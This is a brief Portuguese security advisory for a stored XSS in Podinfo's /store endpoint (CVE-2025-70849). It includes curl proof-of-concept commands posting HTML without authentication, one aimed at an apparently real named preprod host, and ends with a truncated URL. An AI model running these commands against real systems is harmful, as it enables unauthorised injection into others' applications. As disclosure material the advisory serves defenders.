
CVE-2025-70849: XSS armazenado no Podinfo
Uma vulnerabilidade de segurança (CWE-79) foi identificada no Podinfo, uma aplicação web para demonstração de microsserviços Kubernetes. O recurso /store permite que usuários não autenticados enviem conteúdo HTML/JS arbitrário, resultando em XSS Armazenado.
/store<= 6.10.0curl -X POST https://target/store -H "Content-Type: text/html" -d '<h1>CVE-2025-70849</h1>'
curl -X POST https://podinfo.xcr.preprod55.prepd.eastus.kaas.sws.siemens.com/store -H "Content-Type: text/html" -d '<h1>CVE-2025-70849</h1>'

Acesse o hash retornado: https:///store/